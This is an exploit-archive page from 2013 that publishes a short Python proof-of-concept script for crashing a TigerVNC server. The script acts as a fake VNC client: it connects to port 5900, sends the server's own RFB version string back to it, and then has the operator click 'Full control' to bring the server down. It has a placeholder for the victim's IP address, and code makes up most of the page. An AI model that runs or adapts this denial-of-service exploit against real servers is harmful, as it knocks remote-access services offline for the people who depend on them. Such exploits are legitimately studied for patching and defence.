TigerVNC Server Remote DoS Vulnerability



EKU-ID: 3394 CVE: OSVDB-ID:
Author: Z3r0n3 Published: 2013-07-30 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/env python
#================================================================#
# [+] Title: TigerVNC Server Remote DoS Vulnerability            #
# [+] Discovered: 28/07/2013                                     #
# [+] Software Vendor: http://sourceforge.net/projects/tigervnc/ #
# [+] Author: Z3r0n3 - Independent Security Researcher           #                                          
# [+] Contact: z3r0n3@mail.com                                   #
# [+] Overview:                                                  #
#   A remote attacker can crash TigerVNC server by creating      #
#   a fake client. after registring the client, any control      #
#   the server try to do (View-only, Full control...) on the     #
#   client can bring the server down (No one play with clients!) #
#================================================================#
  
import socket, sys;
  
def SrvRecv():
    global srvmsg;
    srvmsg=client.recv(1024);
    print("[<-] Srv: ", srvmsg);
  
host="localhost"; # Put Victim IP  here
port=5900;
  
print("[+] Creating socket...");
client=socket.socket(socket.AF_INET, socket.SOCK_STREAM);
try:
    print("[+] Trying to connect with TigerVNC server...");
    client.connect((host,port));
except socket.error:
    print("[!] Can't connect...");
    client.close()
    sys.exit()
  
print("[x] Connected..."); 
SrvRecv()
client.send(srvmsg) # srvmsg="RFB XXX.XXX"
  
print("""[x] Go to TigerVNC server and click on Full control to obtain a full crash""")
x=input("[x] Don't press anything till the server is down");
client.close();